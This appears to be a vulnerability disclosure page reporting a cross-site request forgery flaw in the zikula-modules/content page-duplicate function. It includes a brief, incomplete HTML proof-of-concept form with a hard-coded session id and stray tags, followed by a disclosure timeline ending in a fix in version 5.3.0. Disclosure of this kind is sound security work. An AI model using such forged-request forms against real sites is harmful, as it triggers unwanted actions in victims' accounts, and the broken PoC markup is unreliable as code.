Cross-Site Request Forgery (CSRF) in zikula-modules/content


Reported on

Dec 27th 2021


There is no csrf protection for content page duplicate functionality.

Proof of Concept

<!DOCTYPE html>



<form method="GET" action="">

<input type="text" name="_zsid" value="aus942jl2kph2f9mrlc0520pmm">

<input type="submit" value="Send">



</script> </form> </body>



This vulnerability is capable of creating more number of duplicates by clicking malicious links

We are processing your report and will contact the zikula-modules/content team within 24 hours. 2 years ago
We have contacted a member of the zikula-modules/content team and are waiting to hear back 2 years ago
Axel Guckelsberger validated this vulnerability 2 years ago
Asura-N has been awarded the disclosure bounty
The fix bounty is now up for grabs
Axel Guckelsberger marked this as fixed in 5.3.0 with commit 5e9bb4 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation